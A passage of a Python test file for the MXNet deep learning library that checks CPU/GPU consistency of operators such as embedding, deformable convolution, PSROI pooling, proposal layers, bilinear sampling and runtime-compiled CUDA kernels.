NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
mx.test_utils.assert_allclose(mod1.get_outputs()[0], mod2.get_outputs()[0], rtol=1e-2, atol=1e-4)
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
@pytest.mark.serial
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
